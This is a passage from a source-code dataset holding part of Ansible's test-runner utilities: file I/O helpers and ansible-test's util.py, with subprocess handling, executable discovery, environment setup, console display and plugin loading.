return to_text(read_binary_file(path))
def read_binary_file(path: str) -> bytes:
"""Return the contents of the specified path as bytes."""
with open_binary_file(path) as file_obj:
return file_obj.read()
def make_dirs(path: str) -> None:
"""Create a directory at path, including any necessary parent directories."""
os.makedirs(to_bytes(path), exist_ok=True)
def write_json_file(
path: str,
content: t.Any,
create_directories: bool = False,
formatted: bool = True,
encoder: t.Optional[t.Type[json.JSONEncoder]] = None,
) -> str:
"""Write the given json content to the specified path, optionally creating missing directories."""
text_content = json.dumps(content,
sort_keys=formatted,
indent=4 if formatted else None,
separators=(', ', ': ') if formatted else (',', ':'),
cls=encoder,
) + '\n'
write_text_file(path, text_content, create_directories=create_directories)
return text_content
def write_text_file(path: str, content: str, create_directories: bool = False) -> None:
"""Write the given text content to the specified path, optionally creating missing directories."""
if create_directories:
make_dirs(os.path.dirname(path))
with open_binary_file(path, 'wb') as file_obj:
file_obj.write(to_bytes(content))
def open_text_file(path: str, mode: str = 'r') -> t.IO[str]:
"""Open the given path for text access."""
if 'b' in mode:
raise Exception('mode cannot include "b" for text files: %s' % mode)
return io.open(to_bytes(path), mode, encoding=ENCODING) # pylint: disable=consider-using-with
def open_binary_file(path: str, mode: str = 'rb') -> t.IO[bytes]:
"""Open the given path for binary access."""
if 'b' not in mode:
raise Exception('mode must include "b" for binary files: %s' % mode)
return io.open(to_bytes(path), mode) # pylint: disable=consider-using-with
class SortedSetEncoder(json.JSONEncoder):
"""Encode sets as sorted lists."""
def default(self, o: t.Any) -> t.Any:
"""Return a serialized version of the `o` object."""
if isinstance(o, set):
return sorted(o)
return json.JSONEncoder.default(self, o)
| 2,807
|
Python
|
.py
| 63
| 37.571429
| 102
| 0.644829
|
ansible/ansible
| 62,258
| 23,791
| 861
|
GPL-3.0
|
9/5/2024, 5:11:58 PM (Europe/Amsterdam)
|
13,097
|
util.py
|
ansible_ansible/test/lib/ansible_test/_internal/util.py
|
"""Miscellaneous utility functions and classes."""
from __future__ import annotations
import abc
import collections.abc as c
import enum
import fcntl
import importlib.util
import inspect
import json
import keyword
import os
import platform
import pkgutil
import random
import re
import shutil
import stat
import string
import subprocess
import sys
import time
import functools
import shlex
import typing as t
import warnings
from struct import unpack, pack
from termios import TIOCGWINSZ
# CAUTION: Avoid third-party imports in this module whenever possible.
# Any third-party imports occurring here will result in an error if they are vendored by ansible-core.
from .locale_util import (
LOCALE_WARNING,
CONFIGURED_LOCALE,
)
from .encoding import (
to_bytes,
to_optional_bytes,
to_optional_text,
)
from .io import (
open_binary_file,
read_text_file,
)
from .thread import (
mutex,
WrappedThread,
)
from .constants import (
SUPPORTED_PYTHON_VERSIONS,
)
C = t.TypeVar('C')
TBase = t.TypeVar('TBase')
TKey = t.TypeVar('TKey')
TValue = t.TypeVar('TValue')
PYTHON_PATHS: dict[str, str] = {}
COVERAGE_CONFIG_NAME = 'coveragerc'
ANSIBLE_TEST_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# assume running from install
ANSIBLE_ROOT = os.path.dirname(ANSIBLE_TEST_ROOT)
ANSIBLE_LIB_ROOT = os.path.join(ANSIBLE_ROOT, 'ansible')
ANSIBLE_SOURCE_ROOT = None
if not os.path.exists(ANSIBLE_LIB_ROOT):
# running from source
ANSIBLE_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(ANSIBLE_TEST_ROOT)))
ANSIBLE_LIB_ROOT = os.path.join(ANSIBLE_ROOT, 'lib', 'ansible')
ANSIBLE_SOURCE_ROOT = ANSIBLE_ROOT
ANSIBLE_TEST_DATA_ROOT = os.path.join(ANSIBLE_TEST_ROOT, '_data')
ANSIBLE_TEST_UTIL_ROOT = os.path.join(ANSIBLE_TEST_ROOT, '_util')
ANSIBLE_TEST_CONFIG_ROOT = os.path.join(ANSIBLE_TEST_ROOT, 'config')
ANSIBLE_TEST_CONTROLLER_ROOT = os.path.join(ANSIBLE_TEST_UTIL_ROOT, 'controller')
ANSIBLE_TEST_TARGET_ROOT = os.path.join(ANSIBLE_TEST_UTIL_ROOT, 'target')
ANSIBLE_TEST_TOOLS_ROOT = os.path.join(ANSIBLE_TEST_CONTROLLER_ROOT, 'tools')
ANSIBLE_TEST_TARGET_TOOLS_ROOT = os.path.join(ANSIBLE_TEST_TARGET_ROOT, 'tools')
# Modes are set to allow all users the same level of access.
# This permits files to be used in tests that change users.
# The only exception is write access to directories for the user creating them.
# This avoids having to modify the directory permissions a second time.
MODE_READ = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH
MODE_FILE = MODE_READ
MODE_FILE_EXECUTE = MODE_FILE | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
MODE_FILE_WRITE = MODE_FILE | stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH
MODE_DIRECTORY = MODE_READ | stat.S_IWUSR | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
MODE_DIRECTORY_WRITE = MODE_DIRECTORY | stat.S_IWGRP | stat.S_IWOTH
class OutputStream(enum.Enum):
"""The output stream to use when running a subprocess and redirecting/capturing stdout or stderr."""
ORIGINAL = enum.auto()
AUTO = enum.auto()
def get_buffer(self, original: t.BinaryIO) -> t.BinaryIO:
"""Return the correct output buffer to use, taking into account the given original buffer."""
if self == OutputStream.ORIGINAL:
return original
if self == OutputStream.AUTO:
return display.fd.buffer
raise NotImplementedError(str(self))
class Architecture:
"""
Normalized architecture names.
These are the architectures supported by ansible-test, such as when provisioning remote instances.
"""
X86_64 = 'x86_64'
AARCH64 = 'aarch64'
REMOTE_ARCHITECTURES = list(value for key, value in Architecture.__dict__.items() if not key.startswith('__'))
WINDOWS_CONNECTION_VARIABLES: dict[str, t.Any] = {
'psrp+http': dict(
ansible_port=5985,
ansible_psrp_protocol='http',
use_password=True,
),
'psrp+https': dict(
ansible_port=5986,
ansible_psrp_protocol='https',
ansible_psrp_cert_validation='ignore',
use_password=True,
),
'ssh+key': dict(
ansible_port=22,
ansible_shell_type='powershell',
use_password=False,
),
'ssh+password': dict(
ansible_port=22,
ansible_shell_type='powershell',
use_password=True,
),
'winrm+http': dict(
ansible_port=5985,
ansible_winrm_scheme='http',
ansible_winrm_transport='ntlm',
use_password=True,
),
'winrm+https': dict(
ansible_port=5986,
ansible_winrm_scheme='https',
ansible_winrm_server_cert_validation='ignore',
use_password=True,
),
}
"""Dictionary of Windows connection types and variables required to use them."""
WINDOWS_CONNECTIONS = list(WINDOWS_CONNECTION_VARIABLES)
def is_valid_identifier(value: str) -> bool:
"""Return True if the given value is a valid non-keyword Python identifier, otherwise return False."""
return value.isidentifier() and not keyword.iskeyword(value)
def cache(func: c.Callable[[], TValue]) -> c.Callable[[], TValue]:
"""Enforce exclusive access on a decorated function and cache the result."""
storage: dict[None, TValue] = {}
sentinel = object()
@functools.wraps(func)
def cache_func():
"""Cache the return value from func."""
if (value := storage.get(None, sentinel)) is sentinel:
value = storage[None] = func()
return value
wrapper = mutex(cache_func)
return wrapper
@mutex
def detect_architecture(python: str) -> t.Optional[str]:
"""Detect the architecture of the specified Python and return a normalized version, or None if it cannot be determined."""
results: dict[str, t.Optional[str]]
try:
results = detect_architecture.results # type: ignore[attr-defined]
except AttributeError:
results = detect_architecture.results = {} # type: ignore[attr-defined]
if python in results:
return results[python]
if python == sys.executable or os.path.realpath(python) == os.path.realpath(sys.executable):
uname = platform.uname()
else:
data = raw_command([python, '-c', 'import json, platform; print(json.dumps(platform.uname()));'], capture=True)[0]
uname = json.loads(data)
translation = {
'x86_64': Architecture.X86_64, # Linux, macOS
'amd64': Architecture.X86_64, # FreeBSD
'aarch64': Architecture.AARCH64, # Linux, FreeBSD
'arm64': Architecture.AARCH64, # FreeBSD
}
candidates = []
if len(uname) >= 5:
candidates.append(uname[4])
if len(uname) >= 6:
candidates.append(uname[5])
candidates = sorted(set(candidates))
architectures = sorted(set(arch for arch in [translation.get(candidate) for candidate in candidates] if arch))
architecture: t.Optional[str] = None
if not architectures:
display.warning(f'Unable to determine architecture for Python interpreter "{python}" from: {candidates}')
elif len(architectures) == 1:
architecture = architectures[0]
display.info(f'Detected architecture {architecture} for Python interpreter: {python}', verbosity=1)
else:
display.warning(f'Conflicting architectures detected ({architectures}) for Python interpreter "{python}" from: {candidates}')
results[python] = architecture
return architecture
def filter_args(args: list[str], filters: dict[str, int]) -> list[str]:
"""Return a filtered version of the given command line arguments."""
remaining = 0
result = []
for arg in args:
if not arg.startswith('-') and remaining:
remaining -= 1
continue
remaining = 0
parts = arg.split('=', 1)
key = parts[0]
if key in filters:
remaining = filters[key] - len(parts) + 1
continue
result.append(arg)
return result
def read_lines_without_comments(path: str, remove_blank_lines: bool = False, optional: bool = False) -> list[str]:
"""
Returns lines from the specified text file with comments removed.
Comments are any content from a hash symbol to the end of a line.
Any spaces immediately before a comment are also removed.
"""
if optional and not os.path.exists(path):
return []
lines = read_text_file(path).splitlines()
lines = [re.sub(r' *#.*$', '', line) for line in lines]
if remove_blank_lines:
lines = [line for line in lines if line]
return lines
def exclude_none_values(data: dict[TKey, t.Optional[TValue]]) -> dict[TKey, TValue]:
"""Return the provided dictionary with any None values excluded."""
return dict((key, value) for key, value in data.items() if value is not None)
def find_executable(executable: str, cwd: t.Optional[str] = None, path: t.Optional[str] = None, required: t.Union[bool, str] = True) -> t.Optional[str]:
"""
Find the specified executable and return the full path, or None if it could not be found.
If required is True an exception will be raised if the executable is not found.
If required is set to 'warning' then a warning will be shown if the executable is not found.
"""
match = None
real_cwd = os.getcwd()
if not cwd:
cwd = real_cwd
if os.path.dirname(executable):
target = os.path.join(cwd, executable)
if os.path.exists(target) and os.access(target, os.F_OK | os.X_OK):
match = executable
else:
if path is None:
path = os.environ.get('PATH', os.path.defpath)
if path:
path_dirs = path.split(os.path.pathsep)
seen_dirs = set()
for path_dir in path_dirs:
if path_dir in seen_dirs:
continue
seen_dirs.add(path_dir)
if os.path.abspath(path_dir) == real_cwd:
path_dir = cwd
candidate = os.path.join(path_dir, executable)
if os.path.exists(candidate) and os.access(candidate, os.F_OK | os.X_OK):
match = candidate
break
if not match and required:
message = 'Required program "%s" not found.' % executable
if required != 'warning':
raise ApplicationError(message)
display.warning(message)
return match
def find_python(version: str, path: t.Optional[str] = None, required: bool = True) -> t.Optional[str]:
"""
Find and return the full path to the specified Python version.
If required, an exception will be raised not found.
If not required, None will be returned if not found.
"""
version_info = str_to_version(version)
if not path and version_info == sys.version_info[:len(version_info)]:
python_bin = sys.executable
else:
python_bin = find_executable('python%s' % version, path=path, required=required)
return python_bin
@cache
def get_ansible_version() -> str:
"""Return the Ansible version."""
# ansible may not be in our sys.path
# avoids a symlink to release.py since ansible placement relative to ansible-test may change during delegation
load_module(os.path.join(ANSIBLE_LIB_ROOT, 'release.py'), 'ansible_release')
# noinspection PyUnresolvedReferences
from ansible_release import __version__ as ansible_version # pylint: disable=import-error
return ansible_version
def _enable_vendoring() -> None:
"""Enable support for loading Python packages vendored by ansible-core."""
# Load the vendoring code by file path, since ansible may not be in our sys.path.
# Convert warnings into errors, to avoid problems from surfacing later.
with warnings.catch_warnings():
warnings.filterwarnings('error')
load_module(os.path.join(ANSIBLE_LIB_ROOT, '_vendor', '__init__.py'), 'ansible_vendor')
@cache
def get_available_python_versions() -> dict[str, str]:
"""Return a dictionary indicating which supported Python versions are available."""
return dict((version, path) for version, path in ((version, find_python(version, required=False)) for version in SUPPORTED_PYTHON_VERSIONS) if path)
def raw_command(
cmd: c.Iterable[str],
capture: bool,
env: t.Optional[dict[str, str]] = None,
data: t.Optional[str] = None,
cwd: t.Optional[str] = None,
explain: bool = False,
stdin: t.Optional[t.Union[t.IO[bytes], int]] = None,
stdout: t.Optional[t.Union[t.IO[bytes], int]] = None,
interactive: bool = False,
output_stream: t.Optional[OutputStream] = None,
cmd_verbosity: int = 1,
str_errors: str = 'strict',
error_callback: t.Optional[c.Callable[[SubprocessError], None]] = None,
) -> tuple[t.Optional[str], t.Optional[str]]:
"""Run the specified command and return stdout and stderr as a tuple."""
output_stream = output_stream or OutputStream.AUTO
if capture and interactive:
raise InternalError('Cannot combine capture=True with interactive=True.')
if data and interactive:
raise InternalError('Cannot combine data with interactive=True.')
if stdin and interactive:
raise InternalError('Cannot combine stdin with interactive=True.')
if stdout and interactive:
raise InternalError('Cannot combine stdout with interactive=True.')
if stdin and data:
raise InternalError('Cannot combine stdin with data.')
if stdout and not capture:
raise InternalError('Redirection of stdout requires capture=True to avoid redirection of stderr to stdout.')
if output_stream != OutputStream.AUTO and capture:
raise InternalError(f'Cannot combine {output_stream=} with capture=True.')
if output_stream != OutputStream.AUTO and interactive:
raise InternalError(f'Cannot combine {output_stream=} with interactive=True.')
if not cwd:
cwd = os.getcwd()
if not env:
env = common_environment()
cmd = list(cmd)
escaped_cmd = shlex.join(cmd)
if capture:
description = 'Run'
elif interactive:
description = 'Interactive'
else:
description = 'Stream'
description += ' command'
with_types = []
if data:
with_types.append('data')
if stdin:
with_types.append('stdin')
if stdout:
with_types.append('stdout')
if with_types:
description += f' with {"/".join(with_types)}'
display.info(f'{description}: {escaped_cmd}', verbosity=cmd_verbosity, truncate=True)
display.info('Working directory: %s' % cwd, verbosity=2)
program = find_executable(cmd[0], cwd=cwd, path=env['PATH'], required=False)
if program:
display.info('Program found: %s' % program, verbosity=2)
for key in sorted(env.keys()):
display.info('%s=%s' % (key, env[key]), verbosity=2)
if explain:
return None, None
communicate = False
if stdin is not None:
data = None
elif data is not None:
stdin = subprocess.PIPE
communicate = True
elif interactive:
pass # allow the subprocess access to our stdin
else:
stdin = subprocess.DEVNULL
if not interactive:
# When not running interactively, send subprocess stdout/stderr through a pipe.
# This isolates the stdout/stderr of the subprocess from the current process, and also hides the current TTY from it, if any.
# This prevents subprocesses from sharing stdout/stderr with the current process or each other.
# Doing so allows subprocesses to safely make changes to their file handles, such as making them non-blocking (ssh does this).
# This also maintains consistency between local testing and CI systems, which typically do not provide a TTY.
# To maintain output ordering, a single pipe is used for both stdout/stderr when not capturing output unless the output stream is ORIGINAL.
stdout = stdout or subprocess.PIPE
stderr = subprocess.PIPE if capture or output_stream == OutputStream.ORIGINAL else subprocess.STDOUT
communicate = True
else:
stderr = None
start = time.time()
process = None
try:
try:
cmd_bytes = [to_bytes(arg) for arg in cmd]
env_bytes = dict((to_bytes(k), to_bytes(v)) for k, v in env.items())
process = subprocess.Popen(cmd_bytes, env=env_bytes, stdin=stdin, stdout=stdout, stderr=stderr, cwd=cwd) # pylint: disable=consider-using-with
except FileNotFoundError as ex:
raise ApplicationError('Required program "%s" not found.' % cmd[0]) from ex
if communicate:
data_bytes = to_optional_bytes(data)
stdout_bytes, stderr_bytes = communicate_with_process(process, data_bytes, stdout == subprocess.PIPE, stderr == subprocess.PIPE, capture=capture,
output_stream=output_stream)
stdout_text = to_optional_text(stdout_bytes, str_errors) or ''
stderr_text = to_optional_text(stderr_bytes, str_errors) or ''
else:
process.wait()
stdout_text, stderr_text = None, None
finally:
if process and process.returncode is None:
process.kill()
display.info('') # the process we're interrupting may have completed a partial line of output
display.notice('Killed command to avoid an orphaned child process during handling of an unexpected exception.')
status = process.returncode
runtime = time.time() - start
display.info('Command exited with status %s after %s seconds.' % (status, runtime), verbosity=4)
if status == 0:
return stdout_text, stderr_text
raise SubprocessError(cmd, status, stdout_text, stderr_text, runtime, error_callback)
def communicate_with_process(
process: subprocess.Popen,
stdin: t.Optional[bytes],
stdout: bool,
stderr: bool,
capture: bool,
output_stream: OutputStream,
) -> tuple[bytes, bytes]:
"""Communicate with the specified process, handling stdin/stdout/stderr as requested."""
threads: list[WrappedThread] = []
reader: t.Type[ReaderThread]
if capture:
reader = CaptureThread
else:
reader = OutputThread
if stdin is not None:
threads.append(WriterThread(process.stdin, stdin))
if stdout:
stdout_reader = reader(process.stdout, output_stream.get_buffer(sys.stdout.buffer))
threads.append(stdout_reader)
else:
stdout_reader = None
if stderr:
stderr_reader = reader(process.stderr, output_stream.get_buffer(sys.stderr.buffer))
threads.append(stderr_reader)
else:
stderr_reader = None
for thread in threads:
thread.start()
for thread in threads:
try:
thread.wait_for_result()
except Exception as ex: # pylint: disable=broad-except
display.error(str(ex))
if isinstance(stdout_reader, ReaderThread):
stdout_bytes = b''.join(stdout_reader.lines)
else:
stdout_bytes = b''
if isinstance(stderr_reader, ReaderThread):
stderr_bytes = b''.join(stderr_reader.lines)
else:
stderr_bytes = b''
process.wait()
return stdout_bytes, stderr_bytes
class WriterThread(WrappedThread):
"""Thread to write data to stdin of a subprocess."""
def __init__(self, handle: t.IO[bytes], data: bytes) -> None:
super().__init__(self._run)
self.handle = handle
self.data = data
def _run(self) -> None:
"""Workload to run on a thread."""
try:
self.handle.write(self.data)
self.handle.flush()
finally:
self.handle.close()
class ReaderThread(WrappedThread, metaclass=abc.ABCMeta):
"""Thread to read stdout from a subprocess."""
def __init__(self, handle: t.IO[bytes], buffer: t.BinaryIO) -> None:
super().__init__(self._run)
self.handle = handle
self.buffer = buffer
self.lines: list[bytes] = []
@abc.abstractmethod
def _run(self) -> None:
"""Workload to run on a thread."""
class CaptureThread(ReaderThread):
"""Thread to capture stdout from a subprocess into a buffer."""
def _run(self) -> None:
"""Workload to run on a thread."""
src = self.handle
dst = self.lines
try:
for line in src:
dst.append(line)
finally:
src.close()
class OutputThread(ReaderThread):
"""Thread to pass stdout from a subprocess to stdout."""
def _run(self) -> None:
"""Workload to run on a thread."""
src = self.handle
dst = self.buffer
try:
for line in src:
dst.write(line)
dst.flush()
finally:
src.close()
def common_environment() -> dict[str, str]:
"""Common environment used for executing all programs."""
env = dict(
LC_ALL=CONFIGURED_LOCALE,
PATH=os.environ.get('PATH', os.path.defpath),
)
required = (
'HOME',
)
optional = (
'LD_LIBRARY_PATH',
'SSH_AUTH_SOCK',
# MacOS High Sierra Compatibility
# http://sealiesoftware.com/blog/archive/2017/6/5/Objective-C_and_fork_in_macOS_1013.html
# Example configuration for macOS:
# export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
'OBJC_DISABLE_INITIALIZE_FORK_SAFETY',
'ANSIBLE_KEEP_REMOTE_FILES',
# MacOS Homebrew Compatibility
# https://cryptography.io/en/latest/installation/#building-cryptography-on-macos
# This may also be required to install pyyaml with libyaml support when installed in non-standard locations.
# Example configuration for brew on macOS:
# export LDFLAGS="-L$(brew --prefix openssl)/lib/ -L$(brew --prefix libyaml)/lib/"
# export CFLAGS="-I$(brew --prefix openssl)/include/ -I$(brew --prefix libyaml)/include/"
'LDFLAGS',
'CFLAGS',
)
# FreeBSD Compatibility
# This is required to include libyaml support in PyYAML.
# The header /usr/local/include/yaml.h isn't in the default include path for the compiler.
# It is included here so that tests can take advantage of it, rather than only ansible-test during managed pip installs.
# If CFLAGS has been set in the environment that value will take precedence due to being an optional var when calling pass_vars.
if os.path.exists('/etc/freebsd-update.conf'):
env.update(CFLAGS='-I/usr/local/include/')
env.update(pass_vars(required=required, optional=optional))
return env
def report_locale(show_warning: bool) -> None:
"""Report the configured locale and the locale warning, if applicable."""
display.info(f'Configured locale: {CONFIGURED_LOCALE}', verbosity=1)
if LOCALE_WARNING and show_warning:
display.warning(LOCALE_WARNING)
def pass_vars(required: c.Collection[str], optional: c.Collection[str]) -> dict[str, str]:
"""Return a filtered dictionary of environment variables based on the current environment."""
env = {}
for name in required:
if name not in os.environ:
raise MissingEnvironmentVariable(name)
env[name] = os.environ[name]
for name in optional:
if name not in os.environ:
continue
env[name] = os.environ[name]
return env
def verified_chmod(path: str, mode: int) -> None:
"""Perform chmod on the specified path and then verify the permissions were applied."""
os.chmod(path, mode) # pylint: disable=ansible-bad-function
executable = any(mode & perm for perm in (stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH))
if executable and not os.access(path, os.X_OK):
raise ApplicationError(f'Path "{path}" should executable, but is not. Is the filesystem mounted with the "noexec" option?')
def remove_tree(path: str) -> None:
"""Remove the specified directory, silently continuing if the directory does not exist."""
try:
shutil.rmtree(to_bytes(path))
except FileNotFoundError:
pass
def is_binary_file(path: str) -> bool:
"""Return True if the specified file is a binary file, otherwise return False."""
assume_text = {
'.cfg',
'.conf',
'.crt',
'.cs',
'.css',
'.html',
'.ini',
'.j2',
'.js',
'.json',
'.md',
'.pem',
'.ps1',
'.psm1',
'.py',
'.rst',
'.sh',
'.txt',
'.xml',
'.yaml',
'.yml',
}
assume_binary = {
'.bin',
'.eot',
'.gz',
'.ico',
'.iso',
'.jpg',
'.otf',
'.p12',
'.png',
'.pyc',
'.rpm',
'.ttf',
'.woff',
'.woff2',
'.zip',
}
ext = os.path.splitext(path)[1]
if ext in assume_text:
return False
if ext in assume_binary:
return True
with open_binary_file(path) as path_fd:
return b'\0' in path_fd.read(4096)
def generate_name(length: int = 8) -> str:
"""Generate and return a random name."""
return ''.join(random.choice(string.ascii_letters + string.digits) for _idx in range(length))
def generate_password() -> str:
"""Generate and return random password."""
chars = [
string.ascii_letters,
string.digits,
string.ascii_letters,
string.digits,
'-',
] * 4
password = ''.join([random.choice(char) for char in chars[:-1]])
display.sensitive.add(password)
return password
class Display:
"""Manages color console output."""
clear = '\033[0m'
red = '\033[31m'
green = '\033[32m'
yellow = '\033[33m'
blue = '\033[34m'
purple = '\033[35m'
cyan = '\033[36m'
verbosity_colors = {
0: None,
1: green,
2: blue,
3: cyan,
}
def __init__(self) -> None:
self.verbosity = 0
self.color = sys.stdout.isatty()
self.warnings: list[str] = []
self.warnings_unique: set[str] = set()
self.fd = sys.stderr # default to stderr until config is initialized to avoid early messages going to stdout
self.rows = 0
self.columns = 0
self.truncate = 0
self.redact = True
self.sensitive: set[str] = set()
if os.isatty(0):
self.rows, self.columns = unpack('HHHH', fcntl.ioctl(0, TIOCGWINSZ, pack('HHHH', 0, 0, 0, 0)))[:2]
def __warning(self, message: str) -> None:
"""Internal implementation for displaying a warning message."""
self.print_message('WARNING: %s' % message, color=self.purple)
def review_warnings(self) -> None:
"""Review all warnings which previously occurred."""
if not self.warnings:
return
self.__warning('Reviewing previous %d warning(s):' % len(self.warnings))
for warning in self.warnings:
self.__warning(warning)
def warning(self, message: str, unique: bool = False, verbosity: int = 0) -> None:
"""Display a warning level message."""
if verbosity > self.verbosity:
return
if unique:
if message in self.warnings_unique:
return
self.warnings_unique.add(message)
self.__warning(message)
self.warnings.append(message)
def notice(self, message: str) -> None:
"""Display a notice level message."""
self.print_message('NOTICE: %s' % message, color=self.purple)
def error(self, message: str) -> None:
"""Display an error level message."""
self.print_message('ERROR: %s' % message, color=self.red)
def fatal(self, message: str) -> None:
"""Display a fatal level message."""
self.print_message('FATAL: %s' % message, color=self.red, stderr=True)
def info(self, message: str, verbosity: int = 0, truncate: bool = False) -> None:
"""Display an info level message."""
if self.verbosity >= verbosity:
color = self.verbosity_colors.get(verbosity, self.yellow)
self.print_message(message, color=color, truncate=truncate)
def print_message( # pylint: disable=locally-disabled, invalid-name
self,
message: str,
color: t.Optional[str] = None,
stderr: bool = False,
truncate: bool = False,
) -> None:
"""Display a message."""
if self.redact and self.sensitive:
for item in self.sensitive:
if not item:
continue
message = message.replace(item, '*' * len(item))
if truncate:
if len(message) > self.truncate > 5:
message = message[:self.truncate - 5] + ' ...'
if color and self.color:
# convert color resets in message to desired color
message = message.replace(self.clear, color)
message = '%s%s%s' % (color, message, self.clear)
fd = sys.stderr if stderr else self.fd
print(message, file=fd)
fd.flush()
class InternalError(Exception):
"""An unhandled internal error indicating a bug in the code."""
def __init__(self, message: str) -> None:
super().__init__(f'An internal error has occurred in ansible-test: {message}')
class ApplicationError(Exception):
"""General application error."""
class ApplicationWarning(Exception):
"""General application warning which interrupts normal program flow."""
class TimeoutExpiredError(SystemExit):
"""Error raised when the test timeout has been reached or exceeded."""
class SubprocessError(ApplicationError):
"""Error resulting from failed subprocess execution."""
def __init__(
self,
cmd: list[str],
status: int = 0,
stdout: t.Optional[str] = None,
stderr: t.Optional[str] = None,
runtime: t.Optional[float] = None,
error_callback: t.Optional[c.Callable[[SubprocessError], None]] = None,
) -> None:
message = 'Command "%s" returned exit status %s.\n' % (shlex.join(cmd), status)
message += format_command_output(stdout, stderr)
self.cmd = cmd
self.message = message
self.status = status
self.stdout = stdout
self.stderr = stderr
self.runtime = runtime
if error_callback:
error_callback(self)
self.message = self.message.strip()
super().__init__(self.message)
class MissingEnvironmentVariable(ApplicationError):
"""Error caused by missing environment variable."""
def __init__(self, name: str) -> None:
super().__init__('Missing environment variable: %s' % name)
self.name = name
class HostConnectionError(ApplicationError):
"""
Raised when the initial connection during host profile setup has failed and all retries have been exhausted.
Raised by provisioning code when one or more provisioning threads raise this exception.
Also raised when an SSH connection fails for the shell command.
"""
def __init__(self, message: str, callback: t.Callable[[], None] = None) -> None:
super().__init__(message)
self._callback = callback
def run_callback(self) -> None:
"""Run the error callback, if any."""
if self._callback:
self._callback()
def format_command_output(stdout: str, stderr: str) -> str:
"""Return a formatted string containing the given stdout and stderr (if any)."""
message = ''
if stderr := stderr.strip():
message += '>>> Standard Error\n'
message += f'{stderr}{Display.clear}\n'
if stdout := stdout.strip():
message += '>>> Standard Output\n'
message += f'{stdout}{Display.clear}\n'
return message
def retry(func: t.Callable[..., TValue], ex_type: t.Type[BaseException] = SubprocessError, sleep: int = 10, attempts: int = 10, warn: bool = True) -> TValue:
"""Retry the specified function on failure."""
for dummy in range(1, attempts):
try:
return func()
except ex_type as ex:
if warn:
display.warning(str(ex))
time.sleep(sleep)
return func()
def parse_to_list_of_dict(pattern: str, value: str) -> list[dict[str, str]]:
"""Parse lines from the given value using the specified pattern and return the extracted list of key/value pair dictionaries."""
matched = []
unmatched: list[str] = []
for line in value.splitlines():
match = re.search(pattern, line)
if match:
matched.append(match.groupdict())
else:
unmatched.append(line)
if unmatched:
raise Exception('Pattern "%s" did not match values:\n%s' % (pattern, '\n'.join(unmatched)))
return matched
def get_subclasses(class_type: t.Type[C]) -> list[t.Type[C]]:
"""Returns a list of types that are concrete subclasses of the given type."""
subclasses: set[t.Type[C]] = set()
queue: list[t.Type[C]] = [class_type]
while queue:
parent = queue.pop()
for child in parent.__subclasses__():
if child not in subclasses:
if not inspect.isabstract(child):
subclasses.add(child)
queue.append(child)
return sorted(subclasses, key=lambda sc: sc.__name__)
def is_subdir(candidate_path: str, path: str) -> bool:
"""Returns true if candidate_path is path or a subdirectory of path."""
if not path.endswith(os.path.sep):
path += os.path.sep
if not candidate_path.endswith(os.path.sep):
candidate_path += os.path.sep
return candidate_path.startswith(path)
def paths_to_dirs(paths: list[str]) -> list[str]:
"""Returns a list of directories extracted from the given list of paths."""
dir_names = set()
for path in paths:
while True:
path = os.path.dirname(path)
if not path or path == os.path.sep:
break
dir_names.add(path + os.path.sep)
return sorted(dir_names)
def str_to_version(version: str) -> tuple[int, ...]:
"""Return a version tuple from a version string."""
return tuple(int(n) for n in version.split('.'))
def version_to_str(version: tuple[int, ...]) -> str:
"""Return a version string from a version tuple."""
return '.'.join(str(n) for n in version)
def sorted_versions(versions: list[str]) -> list[str]:
"""Return a sorted copy of the given list of versions."""
return [version_to_str(version) for version in sorted(str_to_version(version) for version in versions)]
def import_plugins(directory: str, root: t.Optional[str] = None) -> None:
"""
Import plugins from the given directory relative to the given root.
If the root is not provided, the 'lib' directory for the test runner will be used.
"""
if root is None:
root = os.path.dirname(__file__)
path = os.path.join(root, directory)
package = __name__.rsplit('.', 1)[0]
prefix = '%s.%s.' % (package, directory.replace(os.path.sep, '.'))
for (_module_loader, name, _ispkg) in pkgutil.iter_modules([path], prefix=prefix):
module_path = os.path.join(root, name[len(package) + 1:].replace('.', os.path.sep) + '.py')
load_module(module_path, name)
def load_plugins(base_type: t.Type[C], database: dict[str, t.Type[C]]) -> None:
"""
Load plugins of the specified type and track them in the specified database.
Only plugins which have already been imported will be loaded.
"""
plugins: dict[str, t.Type[C]] = dict((sc.__module__.rsplit('.', 1)[1], sc) for sc in get_subclasses(base_type))
for plugin in plugins:
database[plugin] = plugins[plugin]
def load_module(path: str, name: str) -> None:
"""Load a Python module using the given name and path."""
if name in sys.modules:
return
spec = importlib.util.spec_from_file_location(name, path)
module = importlib.util.module_from_spec(spec)
sys.modules[name] = module
spec.loader.exec_module(module)
def sanitize_host_name(name: str) -> str:
"""Return a sanitized version of the given name, suitable for use as a hostname."""
return re.sub('[^A-Za-z0-9]+', '-', name)[:63].strip('-')
def get_generic_type(base_type: t.Type, generic_base_type: t.Type[TValue]) -> t.Optional[t.Type[TValue]]:
"""Return the generic type arg derived from the generic_base_type type that is associated with the base_type type, if any, otherwise return None."""
# noinspection PyUnresolvedReferences
type_arg = t.get_args(base_type.__orig_bases__[0])[0]
return None if isinstance(type_arg, generic_base_type) else type_arg
def get_type_associations(base_type: t.Type[TBase], generic_base_type: t.Type[TValue]) -> list[tuple[t.Type[TValue], t.Type[TBase]]]:
"""Create and return a list of tuples associating generic_base_type derived types with a corresponding base_type derived type."""
return [item for item in [(get_generic_type(sc_type, generic_base_type), sc_type) for sc_type in get_subclasses(base_type)] if item[1]]
def get_type_map(base_type: t.Type[TBase], generic_base_type: t.Type[TValue]) -> dict[t.Type[TValue], t.Type[TBase]]:
"""Create and return a mapping of generic_base_type derived types to base_type derived types."""
return {item[0]: item[1] for item in get_type_associations(base_type, generic_base_type)}
def verify_sys_executable(path: str) -> t.Optional[str]:
"""Verify that the given path references the current Python interpreter. If not, return the expected path, otherwise return None."""
if path == sys.executable:
return None
if os.path.realpath(path) == os.path.realpath(sys.executable):
return None
expected_executable = raw_command([path, '-c', 'import sys; print(sys.executable)'], capture=True)[0]
if expected_executable == sys.executable:
return None
return expected_executable
def type_guard(sequence: c.Sequence[t.Any], guard_type: t.Type[C]) -> t.TypeGuard[c.Sequence[C]]:
"""
